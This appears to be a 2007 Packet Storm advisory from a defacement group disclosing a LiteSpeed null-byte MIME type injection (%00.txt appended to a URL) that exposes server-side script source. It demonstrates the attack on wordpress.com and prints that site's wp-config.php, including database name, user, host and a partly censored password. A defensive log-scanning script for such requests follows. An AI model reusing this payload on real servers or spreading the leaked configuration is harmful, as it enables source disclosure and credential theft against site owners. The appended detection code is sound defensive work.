litespeed-disclose.txt

2007-10-22T00:00:00
ID PACKETSTORM:60280
Type packetstorm
Reporter Tr3mbl3r
Modified 2007-10-22T00:00:00

Description

                                        
                                            `########################################################################################  
########### ###########  
########### TheDefaced.org ###########  
########### TheDefaced Security Team Presents An 0-day. ###########  
########### LiteSpeed Remote Mime Type Injection ###########  
########### Discovered by:Tr3mbl3r ###########  
########### Shouts to his kitty kats and tacos. ###########  
########################################################################################  
# Product: #  
# LiteSpeed. Discovered in <=3.2.3; should work in all other versions below. #
# #  
# Vuln: #  
# Remote Mime Type Injection #  
# #  
# Description: #  
# LiteSpeed will determine the MIME type of a URL/file incorrectly #
# when the request contains a null byte. #
# #  
# Patch: #  
# Upgrade to LiteSpeed 3.2.4, which has just been released today. #
# 9:15AM PST OCT 22. As I write this it's now 9:30AM PST OCT 22. #
# #
# This vuln was found before an update was released; they fixed it after they found it #
# in their logs. #
# #  
# Risk: Extremely High #  
########################################################################################  
# Example: #   
# Basically, if you had a URL like http://www.site.com/index.php #
# and you wanted this website's source, you could simply add a null byte and an extension, #
# like so: http://www.site.com/index.php%00.txt #
# LiteSpeed would then assume the file is a txt file. #
# #  
# Keep in mind that this vuln is MIME Type Injection... so it works with any type. #
# For example, with %00.rar it would assume index.php was a rar file. #
# There are numerous things you could do. #
# #  
# Why LiteSpeed does this has not been confirmed by us just yet. #
# #
# I assume it has something to do with MIME type handling, thus the name of the exploit: #
# MIME Type Injection. #
########################################################################################  
# An example of this vuln being put to use. #
# #   
# The Following is WordPress.com's Wp-Config.php #  
# http://wordpress.com/wp-config.php%00.txt #  
########################################################################################  
# ###########  
# <?php #  
# #  
# // This is probably useless? #  
# define('DB_NAME', 'wpmu'); // The name of the database #  
# define('DB_USER', 'wpmu'); // Your MySQL username #  
# define('DB_PASSWORD', 'JTO5T**CENSOR-HERE**'); // ...and password #   
# define('DB_HOST', 'two.wordpress.com'); // 99% chance you won't need to change this value #  
# #  
# require('define.php'); #   
# #  
# require(ABSPATH . 'wpmu-settings.php'); #  
# #   
# ?> #  
# #  
##################################################################################################  
# Contact Us #  
##################################################################################################  
# WebSite: http://www.thedefaced.org #  
# Forums for more info: http://www.thedefaced.org/forums/ #  
# IRC: irc.thedefaced.org/#TheDefaced #  
##################################################################################################  
  
`
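
Detection example (added here for defenders; not part of the original advisory and not LiteSpeed code): a scan of web access logs for the request shape described above, a path that decodes to a NUL byte followed by an extension. The log format (Combined Log Format), the sample lines and all function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Request line and status inside a Combined Log Format entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" (?P<status>\d{3})')

def decode_path(target, rounds=2):
    """Percent-decode the path part up to `rounds` times so %2500 is caught too."""
    path = target.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(path)
        if decoded == path:
            break
        path = decoded
    return path

def nul_suffix(target):
    """Return (real_name, injected_suffix) if the path holds a NUL byte, else None."""
    path = decode_path(target)
    if b"\x00" not in path:
        return None
    real, _, suffix = path.partition(b"\x00")
    return real.decode("latin-1"), suffix.decode("latin-1")

def scan(lines):
    """Yield (line_no, status, real_name, suffix) for each request with a NUL in its path."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hit = nul_suffix(m.group("target"))
        if hit:
            yield n, int(m.group("status")), hit[0], hit[1]

# Constructed sample log lines (documentation addresses, made-up sizes and times).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Oct/2007:09:01:00 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.44 - - [22/Oct/2007:09:02:13 -0700] "GET /index.php%00.txt HTTP/1.1" 200 812 "-" "-"',
    '192.0.2.44 - - [22/Oct/2007:09:02:20 -0700] "GET /index.php%2500.rar HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.10 - - [22/Oct/2007:09:03:00 -0700] "GET /a.txt?x=%00 HTTP/1.1" 200 10 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d status %d: %s requested with suffix %r" % hit)
```

A hit with status 200 on a script file is the case to triage first: the response may have contained source, so any credentials in that file should be treated as exposed and rotated.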